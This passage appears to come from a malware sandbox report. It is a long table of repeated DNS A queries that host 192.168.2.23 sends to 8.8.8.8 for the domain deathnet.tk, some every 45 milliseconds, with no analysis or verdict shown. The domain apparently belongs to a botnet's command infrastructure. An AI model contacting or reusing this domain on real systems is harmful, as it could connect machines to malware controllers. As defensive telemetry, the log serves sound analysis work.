              Mar 21, 2022 20:08:41.709017992 CET192.168.2.238.8.8.80xf6b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.757008076 CET192.168.2.238.8.8.80x378Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.802072048 CET192.168.2.238.8.8.80x6f1aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.850142002 CET192.168.2.238.8.8.80x53ccStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.898129940 CET192.168.2.238.8.8.80x12b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.946110010 CET192.168.2.238.8.8.80xc2adStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.994040012 CET192.168.2.238.8.8.80xac71Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.050949097 CET192.168.2.238.8.8.80x1093Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.098160028 CET192.168.2.238.8.8.80xcf4aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.145946980 CET192.168.2.238.8.8.80xdd6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.193275928 CET192.168.2.238.8.8.80xe8aaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.241000891 CET192.168.2.238.8.8.80xbd96Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.295072079 CET192.168.2.238.8.8.80x5358Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.346134901 CET192.168.2.238.8.8.80x32c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.398068905 CET192.168.2.238.8.8.80x1bddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.687366009 CET192.168.2.238.8.8.80x2d25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.689826965 CET192.168.2.238.8.8.80x2d25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.734745026 CET192.168.2.238.8.8.80xc326Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.780735970 CET192.168.2.238.8.8.80x6797Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.826195002 CET192.168.2.238.8.8.80x7acaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.874145031 CET192.168.2.238.8.8.80x9342Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.922969103 CET192.168.2.238.8.8.80x1b60Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.967806101 CET192.168.2.238.8.8.80xb124Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.010174036 CET192.168.2.238.8.8.80x5010Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.054621935 CET192.168.2.238.8.8.80x6934Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.200110912 CET192.168.2.238.8.8.80x3698Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.247775078 CET192.168.2.238.8.8.80xb3dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.295789957 CET192.168.2.238.8.8.80xe01dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.356798887 CET192.168.2.238.8.8.80x2e94Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.402074099 CET192.168.2.238.8.8.80x1d94Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.461087942 CET192.168.2.238.8.8.80xa25fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.506050110 CET192.168.2.238.8.8.80x52e5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.551798105 CET192.168.2.238.8.8.80x65fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.596937895 CET192.168.2.238.8.8.80xfac5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.643115044 CET192.168.2.238.8.8.80x74d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.691726923 CET192.168.2.238.8.8.80x87e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.756342888 CET192.168.2.238.8.8.80xbdfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.802997112 CET192.168.2.238.8.8.80x75bcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.847928047 CET192.168.2.238.8.8.80x8534Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.893098116 CET192.168.2.238.8.8.80xc933Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.938224077 CET192.168.2.238.8.8.80x4e82Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.981281042 CET192.168.2.238.8.8.80xce69Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.024023056 CET192.168.2.238.8.8.80x8a49Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.068236113 CET192.168.2.238.8.8.80x2e42Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.113230944 CET192.168.2.238.8.8.80x97d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.158751011 CET192.168.2.238.8.8.80x9f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.485580921 CET192.168.2.238.8.8.80x98f7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.532040119 CET192.168.2.238.8.8.80x2bcfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.582760096 CET192.168.2.238.8.8.80x128fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.648396969 CET192.168.2.238.8.8.80x3905Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.694757938 CET192.168.2.238.8.8.80x24faStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.738034010 CET192.168.2.238.8.8.80x2a17Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.783046007 CET192.168.2.238.8.8.80x4229Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.826584101 CET192.168.2.238.8.8.80x613eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.877731085 CET192.168.2.238.8.8.80x9c3dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.923656940 CET192.168.2.238.8.8.80x1e5fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.969750881 CET192.168.2.238.8.8.80x239eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.014436007 CET192.168.2.238.8.8.80x3264Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.058027029 CET192.168.2.238.8.8.80x3eb4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.103598118 CET192.168.2.238.8.8.80xdac0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.148333073 CET192.168.2.238.8.8.80x304aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.193835974 CET192.168.2.238.8.8.80x3868Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.239312887 CET192.168.2.238.8.8.80x7328Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.284256935 CET192.168.2.238.8.8.80xf7edStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.329385042 CET192.168.2.238.8.8.80xaf49Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.374488115 CET192.168.2.238.8.8.80x10fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.419471025 CET192.168.2.238.8.8.80x45beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.466278076 CET192.168.2.238.8.8.80xb659Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.512958050 CET192.168.2.238.8.8.80x2dbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.569974899 CET192.168.2.238.8.8.80x726Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.615001917 CET192.168.2.238.8.8.80xc62bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.657886028 CET192.168.2.238.8.8.80xbbdcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.703203917 CET192.168.2.238.8.8.80xf05eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.748328924 CET192.168.2.238.8.8.80x8391Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.791033983 CET192.168.2.238.8.8.80xb230Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.834631920 CET192.168.2.238.8.8.80x734aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.879363060 CET192.168.2.238.8.8.80xc2a6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.923914909 CET192.168.2.238.8.8.80xcd49Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.967533112 CET192.168.2.238.8.8.80xc013Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.012240887 CET192.168.2.238.8.8.80xa75bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.055093050 CET192.168.2.238.8.8.80xf7acStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.100111008 CET192.168.2.238.8.8.80x544cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.143461943 CET192.168.2.238.8.8.80x65d1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.186217070 CET192.168.2.238.8.8.80x747fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.228689909 CET192.168.2.238.8.8.80xad1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.233468056 CET192.168.2.238.8.8.80xad1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.276933908 CET192.168.2.238.8.8.80x2acaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.322276115 CET192.168.2.238.8.8.80x3c0bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.365737915 CET192.168.2.238.8.8.80x7c9dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.410932064 CET192.168.2.238.8.8.80x86b0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.455481052 CET192.168.2.238.8.8.80xd018Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.498543024 CET192.168.2.238.8.8.80xbbc2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.543373108 CET192.168.2.238.8.8.80x25c5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.588516951 CET192.168.2.238.8.8.80xe2e5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.633322001 CET192.168.2.238.8.8.80x1b2cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.678050995 CET192.168.2.238.8.8.80x6075Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.722668886 CET192.168.2.238.8.8.80x8251Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.767399073 CET192.168.2.238.8.8.80xb9deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.810592890 CET192.168.2.238.8.8.80x8b50Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.855357885 CET192.168.2.238.8.8.80xc55bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.901499987 CET192.168.2.238.8.8.80x8fefStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.946981907 CET192.168.2.238.8.8.80x36f7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.993304014 CET192.168.2.238.8.8.80xd730Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.040667057 CET192.168.2.238.8.8.80xae27Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.085752964 CET192.168.2.238.8.8.80x6efdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.129652977 CET192.168.2.238.8.8.80xd6caStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.173379898 CET192.168.2.238.8.8.80x6cbbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.218044996 CET192.168.2.238.8.8.80xd490Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.263113976 CET192.168.2.238.8.8.80x8411Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.308078051 CET192.168.2.238.8.8.80xaefaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.351593971 CET192.168.2.238.8.8.80x3624Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.396341085 CET192.168.2.238.8.8.80xb80bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.440431118 CET192.168.2.238.8.8.80x48d7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.489130974 CET192.168.2.238.8.8.80xa3daStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.533550024 CET192.168.2.238.8.8.80x7224Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.581499100 CET192.168.2.238.8.8.80x53c2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.630918026 CET192.168.2.238.8.8.80x94ffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.682183981 CET192.168.2.238.8.8.80x771Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.730410099 CET192.168.2.238.8.8.80x21b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.776875973 CET192.168.2.238.8.8.80x213aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.821692944 CET192.168.2.238.8.8.80x3223Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.864507914 CET192.168.2.238.8.8.80x4546Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.909161091 CET192.168.2.238.8.8.80xb448Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.952152967 CET192.168.2.238.8.8.80xe489Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.997220993 CET192.168.2.238.8.8.80x1e06Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.041975975 CET192.168.2.238.8.8.80xdcaeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.086636066 CET192.168.2.238.8.8.80xdf85Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.131161928 CET192.168.2.238.8.8.80xa357Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.176569939 CET192.168.2.238.8.8.80x54f7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.221662998 CET192.168.2.238.8.8.80x4227Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.270107031 CET192.168.2.238.8.8.80xcfdbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.313971043 CET192.168.2.238.8.8.80x6982Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.358707905 CET192.168.2.238.8.8.80x100cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.403837919 CET192.168.2.238.8.8.80x14fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.449687004 CET192.168.2.238.8.8.80x4b76Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.494623899 CET192.168.2.238.8.8.80xc8ffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.538037062 CET192.168.2.238.8.8.80xf81eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.587593079 CET192.168.2.238.8.8.80x250Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.638058901 CET192.168.2.238.8.8.80x6c01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.683135986 CET192.168.2.238.8.8.80x60feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.728405952 CET192.168.2.238.8.8.80x154Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.774312019 CET192.168.2.238.8.8.80x1f69Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.822809935 CET192.168.2.238.8.8.80x9ca5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.869410038 CET192.168.2.238.8.8.80x73f7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.917006016 CET192.168.2.238.8.8.80xf188Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:59.961407900 CET192.168.2.238.8.8.80xa18eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.006026030 CET192.168.2.238.8.8.80x39c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.050225019 CET192.168.2.238.8.8.80x83c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.094994068 CET192.168.2.238.8.8.80xe0a0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.140286922 CET192.168.2.238.8.8.80x6a7cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.188329935 CET192.168.2.238.8.8.80x748fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.233254910 CET192.168.2.238.8.8.80x78e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.278964996 CET192.168.2.238.8.8.80xa03fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.325473070 CET192.168.2.238.8.8.80x6dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.370634079 CET192.168.2.238.8.8.80x3e2fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.415846109 CET192.168.2.238.8.8.80x7c8dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.460810900 CET192.168.2.238.8.8.80x9ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.505928040 CET192.168.2.238.8.8.80x7ceaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.551311016 CET192.168.2.238.8.8.80x177eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.600433111 CET192.168.2.238.8.8.80x801bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.647140026 CET192.168.2.238.8.8.80x73aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.692843914 CET192.168.2.238.8.8.80x5464Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.737987995 CET192.168.2.238.8.8.80xd503Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.784707069 CET192.168.2.238.8.8.80xb683Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.834192038 CET192.168.2.238.8.8.80xa386Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.876827955 CET192.168.2.238.8.8.80x999cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.920376062 CET192.168.2.238.8.8.80x4045Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:00.964960098 CET192.168.2.238.8.8.80x7b94Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.009639025 CET192.168.2.238.8.8.80xc21cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.054419994 CET192.168.2.238.8.8.80xbc3bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.099720955 CET192.168.2.238.8.8.80x9722Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.144483089 CET192.168.2.238.8.8.80x6611Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.189645052 CET192.168.2.238.8.8.80xed7cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.234813929 CET192.168.2.238.8.8.80xb078Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.279978991 CET192.168.2.238.8.8.80x6ca2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.322515011 CET192.168.2.238.8.8.80xd29Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.367791891 CET192.168.2.238.8.8.80x2c41Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.412178993 CET192.168.2.238.8.8.80xcd97Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.455147982 CET192.168.2.238.8.8.80x8150Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.499721050 CET192.168.2.238.8.8.80xf9b4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.546772003 CET192.168.2.238.8.8.80xaebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.592686892 CET192.168.2.238.8.8.80x71b9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.640527964 CET192.168.2.238.8.8.80xf66Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.686696053 CET192.168.2.238.8.8.80xdfa9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.732809067 CET192.168.2.238.8.8.80x34d8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.778120041 CET192.168.2.238.8.8.80x7c16Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.822033882 CET192.168.2.238.8.8.80xe7b3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.868897915 CET192.168.2.238.8.8.80xd08bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.913526058 CET192.168.2.238.8.8.80x3d0aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:01.956693888 CET192.168.2.238.8.8.80x4598Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.005372047 CET192.168.2.238.8.8.80x39f6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.048818111 CET192.168.2.238.8.8.80xb5e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.093566895 CET192.168.2.238.8.8.80x8852Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.140033007 CET192.168.2.238.8.8.80x4b6bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.184680939 CET192.168.2.238.8.8.80xf069Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.229684114 CET192.168.2.238.8.8.80x36d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.277401924 CET192.168.2.238.8.8.80x2ecdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.324789047 CET192.168.2.238.8.8.80xc54cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.368316889 CET192.168.2.238.8.8.80xede8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.413368940 CET192.168.2.238.8.8.80xa6b1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.459806919 CET192.168.2.238.8.8.80x6c92Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.505762100 CET192.168.2.238.8.8.80xc804Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.550792933 CET192.168.2.238.8.8.80xda11Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.593990088 CET192.168.2.238.8.8.80xf116Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.639522076 CET192.168.2.238.8.8.80xae56Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.683131933 CET192.168.2.238.8.8.80x6a56Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.735022068 CET192.168.2.238.8.8.80xd33cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.781670094 CET192.168.2.238.8.8.80x49afStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.828182936 CET192.168.2.238.8.8.80x4952Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.873552084 CET192.168.2.238.8.8.80x5812Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.919131994 CET192.168.2.238.8.8.80x3af7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:02.962218046 CET192.168.2.238.8.8.80x5f55Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.007077932 CET192.168.2.238.8.8.80xdce2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.055295944 CET192.168.2.238.8.8.80x1d46Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.099256992 CET192.168.2.238.8.8.80xf465Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.146205902 CET192.168.2.238.8.8.80xae58Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.193240881 CET192.168.2.238.8.8.80x66d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:03.239928961 CET192.168.2.238.8.8.80x6d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
